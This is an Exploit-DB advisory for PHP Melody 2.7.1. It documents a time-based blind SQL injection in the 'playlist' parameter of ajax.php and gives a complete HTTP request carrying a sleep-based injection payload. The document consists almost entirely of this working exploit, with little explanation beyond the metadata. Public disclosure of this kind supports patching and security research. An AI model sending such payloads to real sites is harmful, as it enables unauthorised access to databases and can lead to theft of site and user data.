EDB-ID: 43409 | Author: Ahmad Mahfouz | Published: 2017-12-31 | CVE: N/A | Type: Webapps | Platform: PHP | Vulnerable App: N/A | # Date: 30/12/2017
# Exploit Author: Ahmad Mahfouz
# Contact: http://twitter.com/eln1x
# Vendor Homepage: http://www.phpsugar.com/ Buy http://www.phpsugar.com/phpmelody_order.html
# Version: 2.7.1
# Tested on: Mac OS
#
# SQL Injection Type: time-based blind
# Parameter: playlist
# Page: ajax.php
# URL: http://target.com/ajax.php?p=video&do=getplayer&vid=[VALID_VIDO_ID]&aid=1&player=detail&playlist=[SQLi]
GET /ajax.php?p=video&do=getplayer&vid=randomid&aid=1&player=detail&playlist='+(select*from(select(sleep(20)))a)+' HTTP/1.1
Host: localhost
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close